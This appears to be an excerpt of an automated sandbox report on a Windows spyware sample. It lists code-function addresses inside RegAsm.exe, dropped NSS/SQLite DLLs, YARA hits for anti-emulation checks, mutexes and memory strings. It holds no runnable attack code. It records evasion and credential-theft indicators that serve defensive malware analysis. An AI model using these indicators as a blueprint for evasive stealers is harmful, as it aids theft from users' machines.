Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA64DB0	29_2_6CA64DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA53D80	29_2_6CA53D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBA9D90	29_2_6CBA9D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAF6D90	29_2_6CAF6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB31DC0	29_2_6CB31DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC3D00	29_2_6CAC3D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB2ED70	29_2_6CB2ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAE6E90	29_2_6CAE6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA6AEC0	29_2_6CA6AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA83EC0	29_2_6CA83EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB00EC0	29_2_6CB00EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBBBE70	29_2_6CBBBE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBE5E60	29_2_6CBE5E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAFEE70	29_2_6CAFEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB8BE40	29_2_6CB8BE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBA8FB0	29_2_6CBA8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA6EFB0	29_2_6CA6EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA81F90	29_2_6CA81F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB0BFF0	29_2_6CB0BFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA60FE0	29_2_6CA60FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB7DFC0	29_2_6CB7DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA95F20	29_2_6CA95F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA55F30	29_2_6CA55F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBB7F20	29_2_6CBB7F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA66F10	29_2_6CA66F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CACEF40	29_2_6CACEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA6D8E0	29_2_6CA6D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA938E0	29_2_6CA938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBBB8F0	29_2_6CBBB8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAFF8C0	29_2_6CAFF8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAB0820	29_2_6CAB0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAEA820	29_2_6CAEA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CABD810	29_2_6CABD810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB34840	29_2_6CB34840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB209B0	29_2_6CB209B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAF09A0	29_2_6CAF09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB1A9A0	29_2_6CB1A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB31990	29_2_6CB31990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA71980	29_2_6CA71980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB7C9E0	29_2_6CB7C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA949F0	29_2_6CA949F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC59F0	29_2_6CAC59F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAF79F0	29_2_6CAF79F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAF99C0	29_2_6CAF99C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA999D0	29_2_6CA999D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB15920	29_2_6CB15920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA98960	29_2_6CA98960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CADF960	29_2_6CADF960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB1D960	29_2_6CB1D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA5E950	29_2_6CA5E950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA68AA0	29_2_6CA68AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CADEA80	29_2_6CADEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA61AE0	29_2_6CA61AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB18A30	29_2_6CB18A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB01A10	29_2_6CB01A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB0EA00	29_2_6CB0EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA9FA10	29_2_6CA9FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CADCA70	29_2_6CADCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAB9BA0	29_2_6CAB9BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB00BA0	29_2_6CB00BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAA7BF0	29_2_6CAA7BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAABB20	29_2_6CAABB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA51B70	29_2_6CA51B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB8A480	29_2_6CB8A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA614E0	29_2_6CA614E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAA64D0	29_2_6CAA64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAFA4D0	29_2_6CAFA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC4420	29_2_6CAC4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAEA430	29_2_6CAEA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAED410	29_2_6CAED410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA78460	29_2_6CA78460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA545B0	29_2_6CA545B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA99590	29_2_6CA99590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB2A5E0	29_2_6CB2A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAEE5F0	29_2_6CAEE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAE55F0	29_2_6CAE55F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBAF510	29_2_6CBAF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC7500	29_2_6CAC7500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA75510	29_2_6CA75510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB00570	29_2_6CB00570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC2560	29_2_6CAC2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CBA8550	29_2_6CBA8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAB8540	29_2_6CAB8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA916A0	29_2_6CA916A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC96A0	29_2_6CAC96A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CABE6E0	29_2_6CABE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAFE6E0	29_2_6CAFE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA846D0	29_2_6CA846D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA56600	29_2_6CA56600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA89600	29_2_6CA89600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAD7610	29_2_6CAD7610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAB5640	29_2_6CAB5640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA79650	29_2_6CA79650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CABC650	29_2_6CABC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAEB7A0	29_2_6CAEB7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA57790	29_2_6CA57790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA8A7D0	29_2_6CA8A7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA83720	29_2_6CA83720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAE0700	29_2_6CAE0700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CACD710	29_2_6CACD710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA700B0	29_2_6CA700B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB17090	29_2_6CB17090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA58090	29_2_6CA58090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAAB020	29_2_6CAAB020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB28010	29_2_6CB28010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB2C000	29_2_6CB2C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAAE070	29_2_6CAAE070

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040AA20 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00404610 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CBE09D0 appears 158 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CB7CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CB894D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040A310 appears 59 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CD709D0 appears 114 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004020FD appears 287 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CBED930 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041A3AC appears 77 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CBEDAE0 appears 77 times

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1760

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.1244342672.000000000160E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userFBKFCFBFID.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: userIEHDAFHDHC.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DHCGHDHIDH.exe.29.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HDAFIIDAKJ.exe.29.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@49/63@3/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6CBA7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6CBA7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

3_2_004190A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_004365E0 CoCreateInstance,

24_2_004365E0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\HDAFIIDAKJ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6228:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3168
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4800

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user~1\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
